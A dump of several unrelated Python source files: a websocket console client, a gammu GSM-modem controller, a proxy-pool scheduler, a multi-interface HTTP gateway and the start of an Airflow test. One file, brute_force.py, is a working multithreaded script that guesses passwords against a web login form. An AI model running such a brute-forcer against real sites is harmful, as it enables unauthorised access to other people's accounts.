    parser.add_argument("-n", "--nocert", action='store_true',
                        help="Ignore invalid SSL cert")
    parser.add_argument("-r", "--raw", action="store_true",
                        help="raw output")
    parser.add_argument("-s", "--subprotocols", nargs='*',
                        help="Set subprotocols")
    parser.add_argument("-o", "--origin",
                        help="Set origin")
    parser.add_argument("--eof-wait", default=0, type=int,
                        help="wait time(second) after 'EOF' received.")
    parser.add_argument("-t", "--text",
                        help="Send initial text")
    parser.add_argument("--timings", action="store_true",
                        help="Print timings in seconds")
    parser.add_argument("--headers",
                        help="Set custom headers. Use ',' as separator")

    return parser.parse_args()


class RawInput:
    """Mixin providing a Python 2/3 compatible raw_input normalized to utf-8."""

    def raw_input(self, prompt):
        if six.PY3:
            line = input(prompt)
        else:
            line = raw_input(prompt)

        # Re-encode non-utf-8 terminal input to utf-8 bytes for sending.
        if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
            line = line.decode(ENCODING).encode("utf-8")
        elif isinstance(line, six.text_type):
            line = line.encode("utf-8")

        return line


class InteractiveConsole(RawInput, code.InteractiveConsole):
    """Console that rewrites the current line so incoming messages don't
    clobber the user's prompt (uses ANSI erase/cursor escapes)."""

    def write(self, data):
        sys.stdout.write("\033[2K\033[E")
        # sys.stdout.write("\n")
        sys.stdout.write("\033[34m< " + data + "\033[39m")
        sys.stdout.write("\n> ")
        sys.stdout.flush()

    def read(self):
        return self.raw_input("> ")


class NonInteractive(RawInput):
    """Plain line-oriented console for --raw mode (no prompt, no colors)."""

    def write(self, data):
        sys.stdout.write(data)
        sys.stdout.write("\n")
        sys.stdout.flush()

    def read(self):
        return self.raw_input("")


def main():
    """Entry point: connect, spawn the receive thread, loop sending input."""
    start_time = time.time()
    args = parse_args()
    if args.verbose > 1:
        websocket.enableTrace(True)
    options = {}
    if args.proxy:
        p = urlparse(args.proxy)
        options["http_proxy_host"] = p.hostname
        options["http_proxy_port"] = p.port
    if args.origin:
        options["origin"] = args.origin
    if args.subprotocols:
        options["subprotocols"] = args.subprotocols
    opts = {}
    if args.nocert:
        opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
    if args.headers:
        # FIX: materialize as a list. websocket-client's "header" option
        # expects a list (or dict); a lazy map object is exhausted after a
        # single iteration and would silently drop the headers on any
        # subsequent pass.
        options['header'] = list(map(str.strip, args.headers.split(',')))
    ws = websocket.create_connection(args.url, sslopt=opts, **options)
    if args.raw:
        console = NonInteractive()
    else:
        console = InteractiveConsole()
        print("Press Ctrl+C to quit")

    def recv():
        """Receive one frame; answer pings/closes per the protocol.

        Returns (opcode, data); data is None for close frames and on
        receive errors (which are reported as a synthetic CLOSE).
        """
        try:
            frame = ws.recv_frame()
        except websocket.WebSocketException:
            return websocket.ABNF.OPCODE_CLOSE, None
        if not frame:
            raise websocket.WebSocketException("Not a valid frame %s" % frame)
        elif frame.opcode in OPCODE_DATA:
            return frame.opcode, frame.data
        elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
            ws.send_close()
            return frame.opcode, None
        elif frame.opcode == websocket.ABNF.OPCODE_PING:
            ws.pong(frame.data)
            return frame.opcode, frame.data

        return frame.opcode, frame.data

    def recv_ws():
        """Background loop: print every received message until CLOSE."""
        while True:
            opcode, data = recv()
            msg = None
            if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
                data = str(data, "utf-8")
            if not args.verbose and opcode in OPCODE_DATA:
                msg = data
            elif args.verbose:
                msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)

            if msg is not None:
                if args.timings:
                    console.write(str(time.time() - start_time) + ": " + msg)
                else:
                    console.write(msg)

            if opcode == websocket.ABNF.OPCODE_CLOSE:
                break

    thread = threading.Thread(target=recv_ws)
    thread.daemon = True
    thread.start()

    if args.text:
        ws.send(args.text)

    while True:
        try:
            message = console.read()
            ws.send(message)
        except KeyboardInterrupt:
            return
        except EOFError:
            # give the receive thread a chance to drain before exiting
            time.sleep(args.eof_wait)
            return


if __name__ == "__main__":
    try:
        main()
    except Exception as e:
        print(e)
brute_force.py
#!/usr/bin/env python3 from itertools import product from threading import Thread from http.client import responses import requests, sys, os # global var for ending script end = False # thread config pool_limit = 32 threads = [Thread()] * pool_limit # action url of form url = "http://www.example.com/login.php" # set of chars to choose from chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789' # range of password lengths pass_min = 8 pass_max = 16 # dict of form fields data = { 'username': 'MyUsername', } def login(attempt): global end password = ''.join(attempt) data['password'] = password print("Trying {}...".format(password)) r = requests.post(url, data=data) if r.status_code != 200: print( "{}: {}: {}".format( os.path.basename(sys.argv[0]), r.status_code, responses[r.status_code], ) ) end = True elif r.url != url: print("Password: {}".format(password)) end = True def main(): i = 0 for length in range(pass_min, pass_max + 1): to_attempt = product(chars, repeat=length) for attempt in to_attempt: if end: return if threads[i].is_alive(): threads[i].join() threads[i] = Thread(target=login, args=(attempt,)) threads[i].start() i = (i + 1) % pool_limit if __name__ == "__main__": main()
gammu_controller.py
import logging
import threading
from collections import namedtuple

from gammu import StateMachine
from gammu.worker import GammuWorker

from pyphone.controllers.controller import Controller

# Events dispatched to user callbacks registered via bind(); `number` is the
# remote party's phone number string taken from gammu's call notification.
IncomingCallEvent = namedtuple("IncomingCallEvent", ["number"])
EndCallEvent = namedtuple("EndCallEvent", ["number"])


class GammuController(Controller):
    """Controller that drives a GSM modem through python-gammu's worker thread.

    Maintains the modem connection (with automatic reconnect), forwards
    asynchronous gammu results to registered callbacks, and tracks call state
    via threading.Events.
    """

    _log = logging.getLogger(__name__)
    # NOTE(review): these class-level dicts are shared across instances;
    # __init__ rebinds _system_callbacks per instance, but _user_callbacks
    # stays class-level, so multiple instances would share user callbacks.
    _system_callbacks = {}
    _user_callbacks = {}
    # Connection / call state flags (shared, thread-safe Events).
    connecting = threading.Event()
    connected = threading.Event()
    ongoing_call = threading.Event()

    def __init__(self, root_panel):
        super().__init__(root_panel)
        # Internal completion handlers for commands this class issues itself.
        self._system_callbacks = {"Init": self._on_init_complete,
                                  "DialVoice": self._on_dial_voice_complete,
                                  "AnswerCall": self._on_answer_call_complete}
        self._state_machine = StateMachine()
        # All gammu results funnel through _on_gammu_result.
        self._gammu_worker = GammuWorker(self._on_gammu_result)
        self._reconnect_thread = threading.Thread(target=self._reconnect_worker, daemon=True)
        self._reconnect_thread.start()

    def _reconnect_worker(self):
        """Background loop: reconnect when disconnected, otherwise poll the device.

        Runs every 2 seconds until the inherited `stopped` event
        (presumably set by Controller on shutdown -- confirm in base class) fires.
        """
        running = True
        while running:
            if not self.connecting.isSet():
                if not self.connected.isSet():
                    self.try_connect()
                else:
                    # necessary for incoming notifications to work correctly
                    self.enqueue_command("ReadDevice")
            running = not self.stopped.wait(2)

    def try_connect(self):
        """(Re)configure the gammu worker from on-disk config and start it."""
        self.connecting.set()
        # Tear down any previous worker thread before re-initiating.
        # NOTE(review): reaches into GammuWorker's private _thread attribute.
        if self._gammu_worker._thread is not None:
            self._gammu_worker.terminate()
        self._state_machine.ReadConfig()
        self._gammu_worker.configure(self._state_machine.GetConfig())
        self._log.debug("connecting...")
        self._gammu_worker.initiate()

    def cleanup(self):
        """Shut down the modem connection on controller teardown."""
        super().cleanup()
        self._disconnect()

    def enqueue_command(self, command, params=None, callback=None):
        """Queue a gammu command; `callback(name, result, error, percents)` on completion.

        Waits up to 5 s for the connection; if still disconnected, reports
        ERR_NOTCONNECTED to the callback (if any) instead of queueing.
        """
        self._log.debug("-> [command={}] [params={}]".format(command, params))
        if not self.connected.wait(timeout=5):
            if callback is not None:
                self._log.error("<- ERR_NOTCONNECTED: ({} {})".format(command, params))
                callback(command, None, "ERR_NOTCONNECTED", 100)
            return
        if callback is not None:
            # Keyed by command name: a later callback for the same command
            # replaces the earlier one.
            self._user_callbacks[command] = callback
        self._gammu_worker.enqueue_command(command, params)

    def bind(self, event, callback):
        """Register a callback for an event key (command name or *CallEvent class)."""
        self._user_callbacks[event] = callback

    def _disconnect(self):
        """Terminate the worker (best-effort) and mark the connection down."""
        try:
            if self._gammu_worker._thread is not None:
                self._log.info("disconnecting...")
                self._gammu_worker.terminate()
        except:  # noqa: E722 -- deliberately best-effort; never fail teardown
            pass
        self.connected.clear()

    def _on_gammu_result(self, name, result, error, percents):
        """Central gammu result dispatcher (runs on the gammu worker thread)."""
        if self.stopped.isSet():
            return
        # Normalize gammu's "no error" sentinel to None.
        if error == "ERR_NONE":
            error = None
        self._log.debug("<- {0} ({1:d}%): \"{2}\"".format(name, percents, result if error is None else error))
        if name in self._system_callbacks.keys():
            self._system_callbacks[name](name, result, error, percents)
        if name in self._user_callbacks.keys():
            self._user_callbacks[name](name, result, error, percents)
        # Any device-level error means the modem link is gone -- drop it.
        if (error is not None) and (error.startswith("ERR_DEVICE")):
            self._disconnect()

    def _on_init_complete(self, name, result, error, percents):
        """Handle connection result; on success, subscribe to incoming events."""
        if error is None:
            self._log.info("connected!")
            self.connected.set()
            self.connecting.clear()
            # NOTE(review): SetIncomingCallback is enqueued three times with
            # different handlers -- if gammu keeps only one callback, the later
            # registrations overwrite the earlier ones. Verify against the
            # gammu worker API.
            self._gammu_worker.enqueue_command("SetIncomingCall", (True,))
            self._gammu_worker.enqueue_command("SetIncomingCallback", (self._on_incoming_call,))
            self._gammu_worker.enqueue_command("SetIncomingSMS", (True,))
            self._gammu_worker.enqueue_command("SetIncomingCallback", (self._on_incoming_sms,))
            self._gammu_worker.enqueue_command("SetIncomingUSSD", (True,))
            self._gammu_worker.enqueue_command("SetIncomingCallback", (self._on_incoming_ussd,))
        else:
            self._log.error("connection failed: {}".format(error))
            self.connecting.clear()

    def _on_dial_voice_complete(self, name, result, error, percents):
        # An outgoing dial that succeeded marks a call in progress.
        if (not self.ongoing_call.isSet()) and (error is None):
            self.ongoing_call.set()

    def _on_answer_call_complete(self, name, result, error, percents):
        # A failed answer attempt clears the call-in-progress flag.
        if (self.ongoing_call.isSet()) and (error is not None):
            self.ongoing_call.clear()

    def _on_incoming_call(self, state_machine, event_type, data):
        """Translate gammu call notifications into Incoming/EndCall events."""
        self._log.debug("<- [event_type={}] [data={}]".format(event_type, data))
        if (data["Status"] == "IncomingCall") and (not self.ongoing_call.isSet()):
            self.ongoing_call.set()
            if IncomingCallEvent in self._user_callbacks.keys():
                self._user_callbacks[IncomingCallEvent](IncomingCallEvent(data["Number"]))
        elif ((data["Status"] == "CallEnd") or (data["Status"] == "CallLocalEnd")) and self.ongoing_call.isSet():
            self.ongoing_call.clear()
            if EndCallEvent in self._user_callbacks.keys():
                self._user_callbacks[EndCallEvent](EndCallEvent(data["Number"]))

    def _on_incoming_sms(self, state_machine, event_type, data):
        # SMS notifications are currently only logged.
        self._log.debug("<- [event_type={}] [data={}]".format(event_type, data))

    def _on_incoming_ussd(self, state_machine, event_type, data):
        # USSD notifications are currently only logged.
        self._log.debug("<- [event_type={}] [data={}]".format(event_type, data))
scheduler.py
import time
from multiprocessing import Process
from proxypool.api import app
from proxypool.getter import Getter
from proxypool.tester import Tester
from proxypool.setting import *
from .logger_proxy import MyLogger

logger = MyLogger.get_logger('scheduler')


class Scheduler(object):
    """Launches the proxy-pool services (tester, getter, API) as child processes."""

    @staticmethod
    def schedule_tester(cycle=TESTER_CYCLE):
        """Run the proxy tester forever, sleeping `cycle` seconds between passes."""
        checker = Tester()
        while True:
            logger.info('测试器开始运行')
            checker.run()
            time.sleep(cycle)

    @staticmethod
    def schedule_getter(cycle=GETTER_CYCLE):
        """Run the proxy crawler forever, sleeping `cycle` seconds between passes."""
        crawler = Getter()
        while True:
            logger.info('开始抓取代理')
            crawler.run()
            time.sleep(cycle)

    @staticmethod
    def schedule_api():
        """Serve the HTTP API (blocking call)."""
        app.run(API_HOST, API_PORT)

    def run(self):
        """Start one child process per enabled service; processes are not joined."""
        logger.info('代理池开始运行')
        jobs = (
            (TESTER_ENABLED, self.schedule_tester),
            (GETTER_ENABLED, self.schedule_getter),
            (API_ENABLED, self.schedule_api),
        )
        for enabled, target in jobs:
            if enabled:
                Process(target=target).start()
Gateway_v2.py
from http.server import ThreadingHTTPServer, SimpleHTTPRequestHandler
from requests_toolbelt.adapters.source import SourceAddressAdapter
from datetime import datetime, timezone
import config.config as cfg
import requests as req
import logging as log
from socket import *
import threading
import ssl

# HTTP gateway that splits a client's GET across two network interfaces
# ("primary" and "secondary"), weighting the split by measured HEAD latency.
# State is kept in module-level globals mutated per request -- NOT safe for
# concurrent requests despite ThreadingHTTPServer (review note).

# init gateway info
GATEWAY_IP = cfg.primary['ip']
GATEWAY_PORT = cfg.primary['port']

# init test server info
TEST_SERVER_IP = cfg.server['ip']
TEST_SERVER_PORT = str(cfg.server['port'])

# init connection info
PRIMARY_IP = cfg.primary['ip']
PRIMARY_PORT = cfg.primary['port']
SECOND_IP = cfg.secondary['ip']
SECOND_PORT = cfg.secondary['port']
IS_SECOND_AVAILABLE = True

# init request info
REQUESTED_HOSTNAME = ''
REQUESTED_PATH = ''
REQUESTED_PORT = cfg.requested['httpPort']
HTTP_VERSION = cfg.requested['httpVersion']  # holds the scheme prefix, e.g. "http://"
IS_ACCEPT_RANGE = True   # whether origin supports Range requests
IS_VERIFY = False        # True when the requested URL is HTTPS
CONTENT_LENGTH = 0
CONTENT_TYPE = ""

# init timestamps (UTC epoch seconds)
CURRENT_TIME = datetime.now(timezone.utc).timestamp()
START_STAMP_PRIMARY = CURRENT_TIME
END_STAMP_PRIMARY = CURRENT_TIME
START_STAMP_SECOND = CURRENT_TIME
END_STAMP_SECOND = CURRENT_TIME
REQUEST_RECV_TIME = CURRENT_TIME
REQUEST_HANDLE_TIME = CURRENT_TIME

# init range boundaries (byte offsets into the requested resource)
PRIMARY_RANGE_START = 0
PRIMARY_RANGE_END = 0
SECOND_RANGE_START = 0
SECOND_RANGE_END = 0
SECOND_LOAD = 0
SEGMENT_SIZE = 0

# init get request responses to keep them as bytes
RESPONSE_PRIMARY = b""
RESPONSE_SECOND = b""
RESPONSE = b""

# init head request response
HEAD_RESPONSE_HEADERS = None

# init socket request headers (raw HTTP text sent over the secondary socket)
SOCKET_HEAD_HEADERS = ""
SOCKET_GET_HEADERS = ""

# constants to create headers
LINE = "\r\n"
HEADER = LINE + LINE

# TODO delete
TOTAL = 0


def handleRequest(self):
    """Full pipeline for one proxied GET; `self` is the Proxy handler instance."""
    assignRequestInfo(self.path[1:])
    createSocketHeadHeaders()
    measureBandwidth()
    assignContentInfo()
    log.info("++++ Head requests are done ++++")
    getRequestedSource(self)


# Assign request info
# Requested string comes in the format of http://site/path or https://site/path
def assignRequestInfo(requested):
    """Parse scheme, host, port and path out of the proxied URL into globals."""
    global HTTP_VERSION, REQUESTED_PORT, REQUESTED_HOSTNAME, REQUESTED_PATH, IS_VERIFY
    HTTP_VERSION = requested.split(":")[0] + "://"
    # "https://" contains an "s" while "http://" does not.
    if HTTP_VERSION.__contains__("s"):
        IS_VERIFY = True
        REQUESTED_PORT = cfg.requested['httpsPort']
    REQUESTED_HOSTNAME = requested.split("//")[1].split("/")[0]
    # An explicit host:port in the URL forces port 8080 (test-server convention).
    if REQUESTED_HOSTNAME.__contains__(":"):
        REQUESTED_HOSTNAME = REQUESTED_HOSTNAME.split(":")[0]
        REQUESTED_PORT = 8080
    REQUESTED_PATH = '/'
    try:
        REQUESTED_PATH += requested.split("//")[1].split("/", 1)[1]
    except:  # URL has no path component beyond "/"
        log.error("No path was found")


# Create headers to send HEAD request over socket using Secondary Connection
def createSocketHeadHeaders():
    global SOCKET_HEAD_HEADERS
    SOCKET_HEAD_HEADERS = "HEAD " + REQUESTED_PATH + " HTTP/1.1" + LINE
    SOCKET_HEAD_HEADERS += "Host: " + REQUESTED_HOSTNAME + LINE
    SOCKET_HEAD_HEADERS += "Accept: */*" + LINE
    SOCKET_HEAD_HEADERS += "User-Agent: kibitzer" + LINE
    SOCKET_HEAD_HEADERS += "Connection: Close" + HEADER


# Measure bandwidth using HEAD requests over two connections
def measureBandwidth():
    """Time a HEAD request on each interface in parallel; stamps set by workers."""
    defaultThread = threading.Thread(target=sendHeadPrimary)
    mobileThread = threading.Thread(target=sendHeadSecondary)
    defaultThread.start()
    mobileThread.start()
    defaultThread.join()
    mobileThread.join()


# Send HEAD request over Primary Connection
def sendHeadPrimary():
    log.info("*** Primary head is started")
    global START_STAMP_PRIMARY, HEAD_RESPONSE_HEADERS, END_STAMP_PRIMARY
    START_STAMP_PRIMARY = getCurrentTime()
    if REQUESTED_PORT == 8080:
        URL = HTTP_VERSION + REQUESTED_HOSTNAME + ":8080" + REQUESTED_PATH
    else:
        URL = HTTP_VERSION + REQUESTED_HOSTNAME + REQUESTED_PATH
    HEAD_RESPONSE_HEADERS = req.head(URL, verify=IS_VERIFY)
    END_STAMP_PRIMARY = getCurrentTime()
    # Keep only the headers object; the Response itself is discarded.
    HEAD_RESPONSE_HEADERS = HEAD_RESPONSE_HEADERS.headers
    log.info("*** Primary head is done")


# Send HEAD request over Secondary Connection
def sendHeadSecondary():
    """HEAD over a raw socket bound to the secondary interface; flags it
    unavailable on any failure."""
    log.info("--- Secondary head is started")
    global IS_SECOND_AVAILABLE
    try:
        con = socket(AF_INET, SOCK_STREAM)
        # Binding to SECOND_IP routes this socket over the secondary interface.
        con.bind((SECOND_IP, SECOND_PORT))
        if IS_VERIFY:
            sendHeadSecondaryHttps(con)
        else:
            sendHeadSecondaryHttp(con)
        log.info("--- Secondary head is done")
    except:  # any socket/SSL failure disables the secondary path for this run
        log.info("--- Second connection was not found")
        IS_SECOND_AVAILABLE = False


# Send HEAD request to HTTPS sources
def sendHeadSecondaryHttps(con):
    global START_STAMP_SECOND, END_STAMP_SECOND
    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
    context.verify_mode = ssl.CERT_REQUIRED
    context.check_hostname = True
    context.load_default_certs()
    ssl_socket = context.wrap_socket(con, server_hostname=REQUESTED_HOSTNAME)
    ssl_socket.connect((REQUESTED_HOSTNAME, REQUESTED_PORT))
    START_STAMP_SECOND = getCurrentTime()
    ssl_socket.sendall(SOCKET_HEAD_HEADERS.encode("utf-8"))
    # Reading just 10 bytes is enough to time the first response byte.
    ssl_socket.recv(10)
    END_STAMP_SECOND = getCurrentTime()
    ssl_socket.close()
    con.close()


# Send HEAD request to HTTP
def sendHeadSecondaryHttp(con):
    global START_STAMP_SECOND, END_STAMP_SECOND
    con.connect((REQUESTED_HOSTNAME, REQUESTED_PORT))
    START_STAMP_SECOND = getCurrentTime()
    con.sendall(SOCKET_HEAD_HEADERS.encode('utf-8'))
    con.recv(10)
    END_STAMP_SECOND = getCurrentTime()
    con.close()


# Check HEAD request responses and assign content info
def assignContentInfo():
    """Extract Accept-Ranges / Content-Length / Content-Type from the primary
    HEAD response, degrading gracefully when a header is absent."""
    global IS_ACCEPT_RANGE, CONTENT_LENGTH, CONTENT_TYPE
    try:
        if HEAD_RESPONSE_HEADERS["accept-ranges"].lower() == "none":
            IS_ACCEPT_RANGE = False
    except:
        log.error("Accept-Range header was not found")
        IS_ACCEPT_RANGE = False
    try:
        CONTENT_LENGTH = int(HEAD_RESPONSE_HEADERS["content-length"])
    except:
        log.error("Content-Length header was not found")
    try:
        CONTENT_TYPE = HEAD_RESPONSE_HEADERS["content-type"]
    except:
        log.error("Content-Type header was not found")


def getRequestedSource(self):
    """Fetch the resource in 10 segments and stream each back to the client.

    Currently only the primary path is exercised (sendRangeRequest is
    commented out); the latency-derived weight decides how the segment
    WOULD be split. WIP/debug prints are left in place.
    """
    global PRIMARY_RANGE_START, PRIMARY_RANGE_END, SECOND_RANGE_START, SECOND_RANGE_END, SECOND_LOAD, SEGMENT_SIZE, RESPONSE, RESPONSE_PRIMARY
    SEGMENT_SIZE = int(CONTENT_LENGTH / 10)
    segments = list(range(0, CONTENT_LENGTH + 1, SEGMENT_SIZE))
    # print(segments)
    # print(SEGMENT_SIZE)
    # print(SEGMENT_SIZE * 10)
    # print(CONTENT_LENGTH)
    defaultLW, secondaryLW = getLoadWeights()
    headers = {
        "Host": REQUESTED_HOSTNAME,
        "Accept": "*/*",
        "User-Agent": "kibitzer",
        'Connection': 'Close'
    }
    if REQUESTED_PORT == 8080:
        URL = HTTP_VERSION + REQUESTED_HOSTNAME + ":8080" + REQUESTED_PATH
    else:
        URL = HTTP_VERSION + REQUESTED_HOSTNAME + REQUESTED_PATH
    for i in range(0, 10):
        # print("-------" + str(i))
        # Primary gets defaultLW of the segment; secondary gets the remainder.
        PRIMARY_RANGE_START = segments[i]
        PRIMARY_RANGE_END = segments[i] + round(defaultLW * SEGMENT_SIZE) - 1
        # print("pr start: " + str(PRIMARY_RANGE_START))
        # print("pr end: " + str(PRIMARY_RANGE_END))
        SECOND_RANGE_START = PRIMARY_RANGE_END + 1
        SECOND_RANGE_END = segments[i + 1] - 1
        SECOND_LOAD = SECOND_RANGE_END - SECOND_RANGE_START
        # print("sc start: " + str(SECOND_RANGE_START))
        # print("sc end: " + str(SECOND_RANGE_END))
        log.info("*** Primary load length: %s bytes / %s MB", str(PRIMARY_RANGE_END - PRIMARY_RANGE_START), str(round(convertToMb(PRIMARY_RANGE_END - PRIMARY_RANGE_START), 2)))
        log.info("--- Secondary load length: %s bytes / %s MB", str(SECOND_RANGE_END - SECOND_RANGE_START), str(round(convertToMb(SECOND_RANGE_END - SECOND_RANGE_START), 2)))
        if IS_ACCEPT_RANGE:
            rangeValue = 'bytes=' + str(PRIMARY_RANGE_START) + '-' + str(PRIMARY_RANGE_END)
            headers.update({'Range': rangeValue})
            print("rangeValue")
            print(rangeValue)
        RESPONSE_PRIMARY = req.get(URL, headers=headers, verify=True)
        RESPONSE = RESPONSE_PRIMARY.content
        print(RESPONSE_PRIMARY.headers['Content-Range'])
        print(RESPONSE_PRIMARY.headers['Content-Length'])
        # print(RESPONSE_PRIMARY.status_code)
        print("bytes " + str(PRIMARY_RANGE_START) + "-" + str(PRIMARY_RANGE_END) + "/" + str(CONTENT_LENGTH))
        print(SEGMENT_SIZE)
        # sendRangeRequest()
        # pushBackToClient(self)
        global REQUEST_HANDLE_TIME
        # Push this segment back as a 206 Partial Content response.
        # NOTE(review): status line + headers are re-sent for every segment on
        # the same connection -- verify this is what the client expects.
        self.send_response(206)
        self.send_header('Accept-Ranges', "bytes")
        self.send_header('Content-Type', CONTENT_TYPE)
        self.send_header('Access-Control-Allow-Origin', '*')
        self.send_header('Content-Range', "bytes " + str(PRIMARY_RANGE_START) + "-" + str(PRIMARY_RANGE_END) + "/" + str(CONTENT_LENGTH))
        self.send_header('Content-Length', str(SEGMENT_SIZE))
        self.end_headers()
        self.wfile.write(RESPONSE)
        # self.wfile.write(bytearray("asdasd", 'utf-8'))
        log.info("Response is pushed back to client")
        REQUEST_HANDLE_TIME = getCurrentTime()
        log.info("Total time passed: %s seconds", str(round(REQUEST_HANDLE_TIME - REQUEST_RECV_TIME, 2)))
        # Release the segment bytes before fetching the next one.
        RESPONSE_PRIMARY = b""
        RESPONSE = b""
        print("-------------------------------------------------------------------------------------------")


# Calculate load weights
def getLoadWeights():
    """Return (primary, secondary) load fractions from the HEAD latencies.

    The slower a path's HEAD, the smaller its share; falls back to all-primary
    when the secondary stamp is zero.
    """
    primaryStamp = END_STAMP_PRIMARY - START_STAMP_PRIMARY
    secondaryStamp = END_STAMP_SECOND - START_STAMP_SECOND
    log.info("*** Primary stamp: %s", str(round(primaryStamp, 2)))
    log.info("--- Secondary stamp: %s", str(round(secondaryStamp, 2)))
    log.info("Content-Length: %s", str(CONTENT_LENGTH))
    if secondaryStamp != 0:
        defaultLoadRate = round((secondaryStamp / (primaryStamp + secondaryStamp)), 2)
    else:
        defaultLoadRate = 1
    return defaultLoadRate, 1 - defaultLoadRate


# Send GET requests over two connection as Range Requests
def sendRangeRequest():
    """Fetch primary/secondary ranges in parallel and concatenate the bytes."""
    global RESPONSE
    defaultThread = threading.Thread(target=sendGetPrimary)
    if IS_SECOND_AVAILABLE and IS_ACCEPT_RANGE:
        mobileThread = threading.Thread(target=sendGetSecondary)
        mobileThread.start()
    defaultThread.start()
    defaultThread.join()
    if IS_SECOND_AVAILABLE and IS_ACCEPT_RANGE:
        mobileThread.join()
    print("----------------")
    RESPONSE = RESPONSE_PRIMARY + RESPONSE_SECOND


# Send GET request over Primary Connection
def sendGetPrimary():
    log.info("*** Primary GET is started")
    global RESPONSE_PRIMARY
    headers = {
        "Host": REQUESTED_HOSTNAME,
        "Accept": "*/*",
        "User-Agent": "kibitzer",
        'Connection': 'Close'
    }
    if IS_ACCEPT_RANGE:
        rangeValue = 'bytes=' + str(PRIMARY_RANGE_START) + '-' + str(PRIMARY_RANGE_END)
        headers.update({'Range': rangeValue})
    if REQUESTED_PORT == 8080:
        URL = HTTP_VERSION + REQUESTED_HOSTNAME + ":8080" + REQUESTED_PATH
    else:
        URL = HTTP_VERSION + REQUESTED_HOSTNAME + REQUESTED_PATH
    RESPONSE_PRIMARY = req.get(URL, headers=headers, verify=True).content
    log.info("*** Primary GET is done")


# Send GET request over Secondary Connection
def sendGetSecondary():
    """GET the secondary byte range via a session bound to the secondary IP."""
    log.info("--- Secondary GET is started")
    global RESPONSE_SECOND
    headers = {
        "Host": REQUESTED_HOSTNAME,
        "Accept": "*/*",
        "User-Agent": "kibitzer",
        'Connection': 'Close'
    }
    if IS_ACCEPT_RANGE:
        rangeValue = "bytes=" + str(SECOND_RANGE_START) + "-" + str(SECOND_RANGE_END)
        headers.update({'Range': rangeValue})
    if REQUESTED_PORT == 8080:
        URL = HTTP_VERSION + REQUESTED_HOSTNAME + ":8080" + REQUESTED_PATH
    else:
        URL = HTTP_VERSION + REQUESTED_HOSTNAME + REQUESTED_PATH
    s = req.Session()
    # SourceAddressAdapter forces outbound traffic through SECOND_IP.
    s.mount('http://', SourceAddressAdapter(SECOND_IP))
    RESPONSE_SECOND = s.get(URL, headers=headers, verify=True).content
    log.info("--- Secondary GET is done")


# Push back GET request responses to client
def pushBackToClient(self):
    """Write the assembled RESPONSE to the client as a 206.

    NOTE(review): the Content-Range value here ("bytes <size>/<total>") does
    not follow the "bytes start-end/total" format -- confirm before reuse.
    """
    global REQUEST_HANDLE_TIME
    self.send_response(206)
    self.send_header('Content-Type', CONTENT_TYPE)
    self.send_header('Access-Control-Allow-Origin', '*')
    self.send_header('Content-Range', "bytes " + str(SEGMENT_SIZE) + "/" + str(CONTENT_LENGTH))
    self.send_header('Content-Length', str(SEGMENT_SIZE))
    self.end_headers()
    self.wfile.write(RESPONSE)
    # self.wfile.write(bytearray("asdasd", 'utf-8'))
    log.info("Response is pushed back to client")
    REQUEST_HANDLE_TIME = getCurrentTime()
    log.info("Total time passed: %s seconds", str(round(REQUEST_HANDLE_TIME - REQUEST_RECV_TIME, 2)))


def getCurrentTime():
    """Current UTC time as epoch seconds (float)."""
    return datetime.now(timezone.utc).timestamp()


def convertToMb(num):
    """Bytes -> mebibytes."""
    return num / (1024 * 1024)


class Proxy(SimpleHTTPRequestHandler):
    """Request handler: proxies GETs whose path embeds a full target URL."""
    protocol_version = "HTTP/1.1"

    def do_GET(self):
        global REQUEST_RECV_TIME
        # Expected path shape: "/http://host/path" or "/https://host/path".
        if self.path.startswith("/http"):
            log.info("Gateway got a new request")
            REQUEST_RECV_TIME = getCurrentTime()
            handleRequest(self)
            log.info("---------------------------------------------------------------------\n")
        else:
            log.error("Undefined format")


# Module entry: configure file logging and serve forever (blocking).
log.basicConfig(filename='D:\\PyCharm Projects\\Senior\\src\\log_records\\gateway_v2.log', level=log.DEBUG, format='%(asctime)s - %(message)s')
connection = ThreadingHTTPServer((GATEWAY_IP, GATEWAY_PORT), Proxy)
connection.serve_forever()
test_dag_serialization.py
# # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. """Unit tests for stringified DAGs.""" import importlib import importlib.util import multiprocessing import os import unittest from datetime import datetime, timedelta, timezone from glob import glob from unittest import mock import pendulum import pytest from dateutil.relativedelta import FR, relativedelta from kubernetes.client import models as k8s from parameterized import parameterized from airflow.hooks.base import BaseHook from airflow.kubernetes.pod_generator import PodGenerator from airflow.models import DAG, Connection, DagBag, TaskInstance from airflow.models.baseoperator import BaseOperator, BaseOperatorLink from airflow.operators.bash import BashOperator from airflow.security import permissions from airflow.serialization.json_schema import load_dag_schema_dict from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG from airflow.timetables.simple import NullTimetable, OnceTimetable from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink from tests.test_utils.timetables import cron_timetable, delta_timetable executor_config_pod = k8s.V1Pod( metadata=k8s.V1ObjectMeta(name="my-name"), spec=k8s.V1PodSpec( containers=[ 
